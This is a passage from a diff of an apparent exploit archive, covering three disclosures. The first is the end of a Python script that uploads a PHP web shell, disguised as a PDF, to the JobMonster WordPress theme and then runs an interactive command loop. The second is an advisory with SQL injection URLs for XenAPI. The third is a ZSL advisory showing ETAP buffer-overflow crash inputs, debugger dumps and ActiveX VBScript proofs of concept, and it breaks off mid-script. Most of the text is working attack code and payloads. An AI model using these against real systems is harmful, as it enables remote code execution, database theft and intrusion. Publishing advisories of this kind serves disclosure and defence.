headers = {'User-agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0','Referer':'\'http://'+host+'/jobmonster/post-a-resume/?action=resume_general\'','Accept-Language':'en-US,en;q=0.5','Content-type':'multipart/form-data; boundary=---------------------------51402178812572','Connection':'close','Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8','Accept-Encoding':'gzip, deflate','Content-length':'335'}
|
||||||
|
|
||||||
|
body = """-----------------------------51402178812572
|
||||||
|
Content-Disposition: form-data; name="name"
|
||||||
|
|
||||||
|
RCE.php
|
||||||
|
-----------------------------51402178812572
|
||||||
|
Content-Disposition: form-data; name="file"; filename="RCE.php"
|
||||||
|
Content-Type: application/pdf
|
||||||
|
|
||||||
|
<?php
|
||||||
|
system($_GET['cmd']);
|
||||||
|
?>
|
||||||
|
|
||||||
|
-----------------------------51402178812572--"""
|
||||||
|
|
||||||
|
response = requests.post('http://'+host+'/jobmonster/wp-admin/admin-ajax.php?action=noo_plupload&nonce='+nonce+'', data=body, headers=headers, cookies=cj)
|
||||||
|
|
||||||
|
raw_input()
|
||||||
|
while True:
|
||||||
|
try:
|
||||||
|
cmd = raw_input('shell@'+host+':~# ')
|
||||||
|
execute = opener2.open('http://'+host+'/jobmonster/wp-content/uploads/jobmonster/RCE.php?cmd='+urllib.quote(cmd))
|
||||||
|
reverse = execute.read()
|
||||||
|
print reverse
|
||||||
|
|
||||||
|
if cmd.strip() == 'exit':
|
||||||
|
break
|
||||||
|
|
||||||
|
except Exception:
|
||||||
|
break
|
||||||
|
|
||||||
|
sys.exit()
|
85
platforms/php/webapps/39849.txt
Executable file
85
platforms/php/webapps/39849.txt
Executable file
|
@ -0,0 +1,85 @@
|
||||||
|
[RCESEC-2016-002] XenAPI v1.4.1 for XenForo Multiple Unauthenticated SQL Injections
|
||||||
|
|
||||||
|
RCE Security Advisory
|
||||||
|
https://www.rcesecurity.com
|
||||||
|
|
||||||
|
|
||||||
|
1. ADVISORY INFORMATION
|
||||||
|
=======================
|
||||||
|
Product: XenAPI for XenForo
|
||||||
|
Vendor URL: github.com/Contex/XenAPI
|
||||||
|
Type: SQL Injection [CWE-89]
|
||||||
|
Date found: 2016-05-20
|
||||||
|
Date published: 2016-05-23
|
||||||
|
CVSSv3 Score: 7.5 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)
|
||||||
|
CVE: -
|
||||||
|
|
||||||
|
|
||||||
|
2. CREDITS
|
||||||
|
==========
|
||||||
|
This vulnerability was discovered and researched by Julien Ahrens from
|
||||||
|
RCE Security.
|
||||||
|
|
||||||
|
|
||||||
|
3. VERSIONS AFFECTED
|
||||||
|
====================
|
||||||
|
XenAPI for XenForo v1.4.1
|
||||||
|
older versions may be affected too but were not tested.
|
||||||
|
|
||||||
|
|
||||||
|
4. INTRODUCTION
|
||||||
|
===============
|
||||||
|
This Open Source REST API allows usage of several of XenForo's functions,
|
||||||
|
such as authentication, user information and many other functions!
|
||||||
|
|
||||||
|
(from the vendor's homepage)
|
||||||
|
|
||||||
|
|
||||||
|
5. VULNERABILITY DETAILS
|
||||||
|
========================
|
||||||
|
The plugin "XenAPI" for XenForo offers a REST Api with different functions
|
||||||
|
to query and edit information from the XenForo database backend. Amongst
|
||||||
|
those are "getGroup" and "getUsers", which can be called without
|
||||||
|
authentication (default) and since the application does not properly
|
||||||
|
validate and sanitize the "value" parameter, it is possible to inject
|
||||||
|
arbitrary SQL commands into the XenForo backend database.
|
||||||
|
|
||||||
|
The following proof-of-concepts exploit each vulnerable REST action
|
||||||
|
and extract the hostname of the server:
|
||||||
|
|
||||||
|
https://127.0.0.1/api.php?action=getUsers&value=' UNION ALL SELECT
|
||||||
|
CONCAT(IFNULL(CAST(%40%40HOSTNAME AS CHAR)%2C0x20))%2CNULL%23
|
||||||
|
|
||||||
|
https://127.0.0.1/api.php?action=getGroup&value=' UNION ALL SELECT
|
||||||
|
NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CCONCAT(IFNULL(CAST(%40%40HOSTNAME AS
|
||||||
|
CHAR)%2C0x20))%2CNULL%23
|
||||||
|
|
||||||
|
|
||||||
|
6. RISK
|
||||||
|
=======
|
||||||
|
The vulnerability allows remote attackers to read sensitive information
|
||||||
|
from the XenForo database like usernames and passwords. Since the affected
|
||||||
|
REST actions do not require an authentication hash, these vulnerabilities
|
||||||
|
can be exploited by an unauthenticated attacker.
|
||||||
|
|
||||||
|
|
||||||
|
7. SOLUTION
|
||||||
|
===========
|
||||||
|
Update to the latest version v1.4.2
|
||||||
|
|
||||||
|
|
||||||
|
8. REPORT TIMELINE
|
||||||
|
==================
|
||||||
|
2016-05-20: Discovery of the vulnerability
|
||||||
|
2016-05-20: Notified vendor via contact address
|
||||||
|
2016-05-20: Vendor provides update for both issues
|
||||||
|
2016-05-21: Provided update fixes the reported issues
|
||||||
|
2016-05-21: Vendor publishes update
|
||||||
|
2016-05-23: Advisory released
|
||||||
|
|
||||||
|
|
||||||
|
9. REFERENCES
|
||||||
|
=============
|
||||||
|
https://github.com/Contex/XenAPI/commit/00a737a1fe45ffe5c5bc6bace44631ddb73f2ecf
|
||||||
|
https://xenforo.com/community/resources/xenapi-xenforo-php-rest-api.902/update?update=19336
|
||||||
|
|
331
platforms/windows/dos/39846.txt
Executable file
331
platforms/windows/dos/39846.txt
Executable file
|
@ -0,0 +1,331 @@
|
||||||
|
|
||||||
|
Operation Technology ETAP 14.1.0 Multiple Stack Buffer Overrun Vulnerabilities
|
||||||
|
|
||||||
|
|
||||||
|
Vendor: Operation Technology, Inc.
|
||||||
|
Product web page: http://www.etap.com
|
||||||
|
Affected version: 14.1.0.0
|
||||||
|
|
||||||
|
Summary: Enterprise Software Solution for Electrical Power Systems. ETAP
|
||||||
|
is the most comprehensive electrical engineering software platform for the
|
||||||
|
design, simulation, operation, and automation of generation, transmission,
|
||||||
|
distribution, and industrial systems. As a fully integrated model-driven
|
||||||
|
enterprise solution, ETAP extends from modeling to operation to offer a
|
||||||
|
Real-Time Power Management System.
|
||||||
|
|
||||||
|
Desc: Multiple ETAP binaries are prone to a stack-based buffer overflow
|
||||||
|
vulnerability because the application fails to handle malformed arguments.
|
||||||
|
An attacker can exploit these issues to execute arbitrary code within the
|
||||||
|
context of the application or to trigger a denial-of-service conditions.
|
||||||
|
|
||||||
|
Tested on: Microsfot Windows 7 Professional SP1 (EN) x86_64
|
||||||
|
Microsoft Windows 7 Ultimate SP1 (EN) x86_64
|
||||||
|
|
||||||
|
|
||||||
|
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
||||||
|
@zeroscience
|
||||||
|
|
||||||
|
|
||||||
|
Advisory ID: ZSL-2016-5324
|
||||||
|
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5324.php
|
||||||
|
|
||||||
|
|
||||||
|
07.04.2016
|
||||||
|
|
||||||
|
--
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
Confirmed vulnerable binaries:
|
||||||
|
------------------------------
|
||||||
|
|
||||||
|
acsdvd.exe
|
||||||
|
ca.exe
|
||||||
|
csdvd.exe
|
||||||
|
DBExtractConsoleApp.exe
|
||||||
|
dccalc.exe
|
||||||
|
etarcgis.exe
|
||||||
|
etarcgis92.exe
|
||||||
|
etarcgis93.exe
|
||||||
|
ETArcGIS_TD.exe
|
||||||
|
ETArcGIS_TD10.exe
|
||||||
|
etcabp.exe
|
||||||
|
etcp.exe
|
||||||
|
etgrd.exe
|
||||||
|
ETPanelRep.exe
|
||||||
|
ET_CATIA.exe
|
||||||
|
et_ieee.exe
|
||||||
|
harmonic.exe
|
||||||
|
LA3PH.exe
|
||||||
|
LF3PH.exe
|
||||||
|
lffd.exe
|
||||||
|
lfgs.exe
|
||||||
|
lfle.exe
|
||||||
|
lfnr.exe
|
||||||
|
ms.exe
|
||||||
|
OCP.exe
|
||||||
|
opf.exe
|
||||||
|
OtiMongoConvert.exe
|
||||||
|
PlotCompare64.exe
|
||||||
|
ra.exe
|
||||||
|
SC3Ph.exe
|
||||||
|
scansi1p.exe
|
||||||
|
scansi3p.exe
|
||||||
|
SCGost1p.exe
|
||||||
|
sciec1p.exe
|
||||||
|
sciec3p.exe
|
||||||
|
sciectr.exe
|
||||||
|
scsource.exe
|
||||||
|
SFA.exe
|
||||||
|
so3ph.exe
|
||||||
|
stlf.exe
|
||||||
|
svc.exe
|
||||||
|
TDULF.exe
|
||||||
|
ts.exe
|
||||||
|
uc.exe
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
PoCs:
|
||||||
|
-----
|
||||||
|
[vuln binary] [>256 bytes as arg]
|
||||||
|
===================================
|
||||||
|
|
||||||
|
|
||||||
|
C:\ETAP 1410>etcp.exe AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
||||||
|
|
||||||
|
(281c.202c): Access violation - code c0000005 (!!! second chance !!!)
|
||||||
|
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\windows\SysWOW64\ntdll.dll -
|
||||||
|
*** WARNING: Unable to verify checksum for C:\ETAP 1410\etcp.exe
|
||||||
|
*** ERROR: Module load completed but symbols could not be loaded for C:\ETAP 1410\etcp.exe
|
||||||
|
eax=00000041 ebx=00190002 ecx=0000000a edx=00000365 esi=00882966 edi=000003eb
|
||||||
|
eip=00407f38 esp=0018f660 ebp=0018f778 iopl=0 nv up ei pl nz na pe cy
|
||||||
|
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010207
|
||||||
|
etcp+0x7f38:
|
||||||
|
00407f38 668943fe mov word ptr [ebx-2],ax ds:002b:00190000=6341
|
||||||
|
0:000> !exchain
|
||||||
|
0018ff3c: etcp+10041 (00410041)
|
||||||
|
Invalid exception stack at 00410041
|
||||||
|
|
||||||
|
===================================
|
||||||
|
|
||||||
|
|
||||||
|
C:\ETAP 1410>PlotCompare64.exe AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
||||||
|
|
||||||
|
Unhandled Exception: System.AccessViolationException: Attempted to read or write protected memory. This is often an indication that other memory is corrupt.
|
||||||
|
at System.String.wcslen(Char* ptr)
|
||||||
|
at System.String.CtorCharPtr(Char* ptr)
|
||||||
|
at wmain(Int32 argc, Char** argv, Char** envp)
|
||||||
|
at wmainCRTStartup()
|
||||||
|
|
||||||
|
|
||||||
|
(3a98.1e20): Access violation - code c0000005 (first chance)
|
||||||
|
First chance exceptions are reported before any exception handling.
|
||||||
|
This exception may be expected and handled.
|
||||||
|
*** WARNING: Unable to verify checksum for C:\windows\assembly\NativeImages_v4.0.30319_64\mscorlib\54c5d3ee1f311718f3a2feb337c5fa29\mscorlib.ni.dll
|
||||||
|
*** ERROR: Module load completed but symbols could not be loaded for C:\windows\assembly\NativeImages_v4.0.30319_64\mscorlib\54c5d3ee1f311718f3a2feb337c5fa29\mscorlib.ni.dll
|
||||||
|
mscorlib_ni+0x48f380:
|
||||||
|
000007fe`dd6df380 0fb701 movzx eax,word ptr [rcx] ds:0045005c`003a0043=????
|
||||||
|
0:000> d rdi
|
||||||
|
00000000`0278f558 00 65 93 dd fe 07 00 00-06 02 00 00 41 00 41 00 .e..........A.A.
|
||||||
|
00000000`0278f568 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
|
||||||
|
00000000`0278f578 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
|
||||||
|
00000000`0278f588 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
|
||||||
|
00000000`0278f598 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
|
||||||
|
00000000`0278f5a8 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
|
||||||
|
00000000`0278f5b8 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
|
||||||
|
00000000`0278f5c8 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
|
||||||
|
|
||||||
|
===============================
|
||||||
|
|
||||||
|
|
||||||
|
C:\ETAP 1410>ra.exe AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
||||||
|
|
||||||
|
(1e5c.2f90): Access violation - code c0000005 (!!! second chance !!!)
|
||||||
|
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\windows\SysWOW64\ntdll.dll -
|
||||||
|
*** WARNING: Unable to verify checksum for C:\ETAP 1410\ra.exe
|
||||||
|
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\ETAP 1410\ra.exe -
|
||||||
|
eax=0018f4a0 ebx=00000000 ecx=00000041 edx=00000359 esi=005c2962 edi=00000000
|
||||||
|
eip=00408376 esp=0018f2cc ebp=0018f3f4 iopl=0 nv up ei pl nz ac pe nc
|
||||||
|
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010216
|
||||||
|
ra!CFileMap::operator=+0x786:
|
||||||
|
00408376 66898c50ae040000 mov word ptr [eax+edx*2+4AEh],cx ds:002b:00190000=6341
|
||||||
|
0:000> !exchain
|
||||||
|
0018ff3c: ra!CFileMap::GetLength+7b21 (00410041)
|
||||||
|
Invalid exception stack at 00410041
|
||||||
|
0:000> kb
|
||||||
|
ChildEBP RetAddr Args to Child
|
||||||
|
WARNING: Stack unwind information not available. Following frames may be wrong.
|
||||||
|
0018f3f4 0040855f 00000001 0018f430 00000000 ra!CFileMap::operator=+0x786
|
||||||
|
0018f410 00427462 f6504047 00000000 00000001 ra!CFileMap::GetLength+0x3f
|
||||||
|
0018ff48 00410041 00410041 00410041 00410041 ra!CFileMap::SetFileLength+0x125a2
|
||||||
|
0018ff4c 00410041 00410041 00410041 00410041 ra!CFileMap::GetLength+0x7b21
|
||||||
|
0018ff50 00410041 00410041 00410041 00410041 ra!CFileMap::GetLength+0x7b21
|
||||||
|
0018ff54 00410041 00410041 00410041 00410041 ra!CFileMap::GetLength+0x7b21
|
||||||
|
0018ff58 00410041 00410041 00410041 00410041 ra!CFileMap::GetLength+0x7b21
|
||||||
|
0018ff5c 00410041 00410041 00410041 00410041 ra!CFileMap::GetLength+0x7b21
|
||||||
|
0018ff60 00410041 00410041 00410041 00410041 ra!CFileMap::GetLength+0x7b21
|
||||||
|
0018ff64 00410041 00410041 00410041 00410041 ra!CFileMap::GetLength+0x7b21
|
||||||
|
0018ff68 00410041 00410041 00410041 00410041 ra!CFileMap::GetLength+0x7b21
|
||||||
|
0018ff6c 00410041 00410041 00410041 00410041 ra!CFileMap::GetLength+0x7b21
|
||||||
|
0018ff70 00410041 00410041 00410041 00410041 ra!CFileMap::GetLength+0x7b21
|
||||||
|
0018ff74 00410041 00410041 00410041 00410041 ra!CFileMap::GetLength+0x7b21
|
||||||
|
0018ff78 00410041 00410041 00410041 00410041 ra!CFileMap::GetLength+0x7b21
|
||||||
|
0018ff7c 00410041 00410041 00410041 00410041 ra!CFileMap::GetLength+0x7b21
|
||||||
|
0018ff80 00410041 00410041 00410041 00410041 ra!CFileMap::GetLength+0x7b21
|
||||||
|
0018ff84 00410041 00410041 00410041 00410041 ra!CFileMap::GetLength+0x7b21
|
||||||
|
..
|
||||||
|
0:000> d esi
|
||||||
|
005c2962 72 00 61 00 2e 00 65 00-78 00 65 00 20 00 20 00 r.a...e.x.e. . .
|
||||||
|
005c2972 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
|
||||||
|
005c2982 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
|
||||||
|
005c2992 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
|
||||||
|
005c29a2 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
|
||||||
|
005c29b2 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
|
||||||
|
005c29c2 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
|
||||||
|
005c29d2 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
|
||||||
|
|
||||||
|
|
||||||
|
===============================
|
||||||
|
|
||||||
|
|
||||||
|
C:\ETAP 1410>SFA.exe AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
||||||
|
|
||||||
|
STATUS_STACK_BUFFER_OVERRUN encountered
|
||||||
|
(39e0.35b4): WOW64 breakpoint - code 4000001f (first chance)
|
||||||
|
First chance exceptions are reported before any exception handling.
|
||||||
|
This exception may be expected and handled.
|
||||||
|
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\windows\syswow64\kernel32.dll -
|
||||||
|
*** ERROR: Symbol file could not be found. Defaulted to export symbols for SFA.exe -
|
||||||
|
kernel32!GetProfileStringW+0x12cc9:
|
||||||
|
75150265 cc int 3
|
||||||
|
|
||||||
|
|
||||||
|
===============================
|
||||||
|
|
||||||
|
|
||||||
|
C:\ETAP 1410>so3ph.exe AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
||||||
|
|
||||||
|
STATUS_STACK_BUFFER_OVERRUN encountered
|
||||||
|
(380c.3cc4): Break instruction exception - code 80000003 (first chance)
|
||||||
|
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\windows\system32\kernel32.dll -
|
||||||
|
*** WARNING: Unable to verify checksum for SO3Ph.exe
|
||||||
|
*** ERROR: Symbol file could not be found. Defaulted to export symbols for SO3Ph.exe -
|
||||||
|
kernel32!UnhandledExceptionFilter+0x71:
|
||||||
|
00000000`76fcb8c1 cc int 3
|
||||||
|
0:000> r
|
||||||
|
rax=0000000000000000 rbx=0000000000000000 rcx=000063dde1df0000
|
||||||
|
rdx=000000000000fffd rsi=0000000000000001 rdi=0000000000000002
|
||||||
|
rip=0000000076fcb8c1 rsp=00000000000fe780 rbp=ffffffffffffffff
|
||||||
|
r8=0000000000000000 r9=0000000000000000 r10=0000000000000000
|
||||||
|
r11=00000000000fe310 r12=0000000140086150 r13=0000000000000000
|
||||||
|
r14=000000000012eb00 r15=0000000000000000
|
||||||
|
iopl=0 nv up ei pl nz na po nc
|
||||||
|
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000206
|
||||||
|
kernel32!UnhandledExceptionFilter+0x71:
|
||||||
|
00000000`76fcb8c1 cc int 3
|
||||||
|
|
||||||
|
|
||||||
|
===============================
|
||||||
|
|
||||||
|
|
||||||
|
C:\ETAP 1410>TDULF.exe AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
||||||
|
|
||||||
|
(36bc.36b8): Access violation - code c0000005 (first chance)
|
||||||
|
First chance exceptions are reported before any exception handling.
|
||||||
|
This exception may be expected and handled.
|
||||||
|
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\windows\system32\kernel32.dll -
|
||||||
|
*** WARNING: Unable to verify checksum for C:\ETAP 1410\LF3PHDLL.dll
|
||||||
|
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\ETAP 1410\LF3PHDLL.dll -
|
||||||
|
kernel32!lstrcpyW+0xa:
|
||||||
|
00000000`76f7e41a 668911 mov word ptr [rcx],dx ds:00000000`00130000=6341
|
||||||
|
0:000> r
|
||||||
|
rax=000000000012e9d0 rbx=0000000000000001 rcx=0000000000130000
|
||||||
|
rdx=0000000000000041 rsi=0000000000000000 rdi=000000000012bcf0
|
||||||
|
rip=0000000076f7e41a rsp=000000000012bc98 rbp=0000000000000000
|
||||||
|
r8=000000000012fc18 r9=0000000000000000 r10=0000000000000000
|
||||||
|
r11=0000000000000202 r12=0000000000000000 r13=0000000000000000
|
||||||
|
r14=000000000000000a r15=0000000000000000
|
||||||
|
iopl=0 nv up ei pl nz na po nc
|
||||||
|
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206
|
||||||
|
kernel32!lstrcpyW+0xa:
|
||||||
|
00000000`76f7e41a 668911 mov word ptr [rcx],dx ds:00000000`00130000=6341
|
||||||
|
0:000> d rax
|
||||||
|
00000000`0012e9d0 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
|
||||||
|
00000000`0012e9e0 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
|
||||||
|
00000000`0012e9f0 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
|
||||||
|
00000000`0012ea00 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
|
||||||
|
00000000`0012ea10 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
|
||||||
|
00000000`0012ea20 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
|
||||||
|
00000000`0012ea30 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
|
||||||
|
00000000`0012ea40 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
|
||||||
|
...
|
||||||
|
0:000> r
|
||||||
|
rax=0000000000000000 rbx=0000000000000001 rcx=ffffffffffffffff
|
||||||
|
rdx=00410041004123a1 rsi=0000000000000000 rdi=00410041004123a1
|
||||||
|
rip=000007fefd0a17c7 rsp=000000000012b9a8 rbp=0000000000000000
|
||||||
|
r8=ffffffffffffffff r9=000000000012ef68 r10=0000000000000000
|
||||||
|
r11=0000000000000202 r12=0000000000000000 r13=0000000000000000
|
||||||
|
r14=000000000000000a r15=0000000000000000
|
||||||
|
iopl=0 nv up ei ng nz na po nc
|
||||||
|
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010286
|
||||||
|
KERNELBASE!lstrlenW+0x17:
|
||||||
|
000007fe`fd0a17c7 66f2af repne scas word ptr [rdi]
|
||||||
|
|
||||||
|
|
||||||
|
===============================
|
||||||
|
|
||||||
|
|
||||||
|
COM/ActiveX PoCs:
|
||||||
|
-----------------
|
||||||
|
|
||||||
|
|
||||||
|
<html>
|
||||||
|
<object classid='clsid:E19FDFB8-B4F6-4065-BCCF-D37F3E7E4224' id='target' />
|
||||||
|
<script language='vbscript'>
|
||||||
|
targetFile = "C:\Program Files (x86)\Common Files\ETAP\iPlotLibrary.ocx"
|
||||||
|
prototype = "Property Let Name As String"
|
||||||
|
memberName = "Name"
|
||||||
|
progid = "iPlotLibrary.iPlotDataCursorX"
|
||||||
|
argCount = 1
|
||||||
|
arg1=String(1000, "A")
|
||||||
|
target.Name = arg1
|
||||||
|
</script>
|
||||||
|
</html>
|
||||||
|
|
||||||
|
(2750.243c): Access violation - code c0000005 (first chance)
|
||||||
|
First chance exceptions are reported before any exception handling.
|
||||||
|
This exception may be expected and handled.
|
||||||
|
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files (x86)\Common Files\ETAP\iPlotLibrary.ocx -
|
||||||
|
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\windows\syswow64\OLEAUT32.dll -
|
||||||
|
eax=00000000 ebx=00000000 ecx=00000000 edx=02d13084 esi=02d13084 edi=001be684
|
||||||
|
eip=0301c146 esp=001be608 ebp=001be634 iopl=0 nv up ei pl nz ac pe nc
|
||||||
|
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010216
|
||||||
|
iPlotLibrary!DllUnregisterServer+0x104e5a:
|
||||||
|
0301c146 8b4304 mov eax,dword ptr [ebx+4] ds:002b:00000004=????????
|
||||||
|
0:000> d edx
|
||||||
|
02d13084 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
|
||||||
|
02d13094 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
|
||||||
|
02d130a4 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
|
||||||
|
02d130b4 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
|
||||||
|
02d130c4 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
|
||||||
|
02d130d4 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
|
||||||
|
02d130e4 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
|
||||||
|
02d130f4 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
|
||||||
|
|
||||||
|
|
||||||
|
===============================
|
||||||
|
|
||||||
|
|
||||||
|
<html>
|
||||||
|
<object classid='clsid:E19FDFB8-B4F6-4065-BCCF-D37F3E7E4224' id='target' />
|
||||||
|
<script language='vbscript'>
|
||||||
|
targetFile = "C:\Program Files (x86)\Common Files\ETAP\iPlotLibrary.ocx"
|
||||||
|
prototype = "Property Let MenuItemCaptionValueY As String"
|
||||||
|
memberName = "MenuItemCaptionValueY"
|
||||||
|
progid = "iPlotLibrary.iPlotDataCursorX"
|
||||||
|
argCount = 1
|
||||||
|
arg1=String(1044, "A")
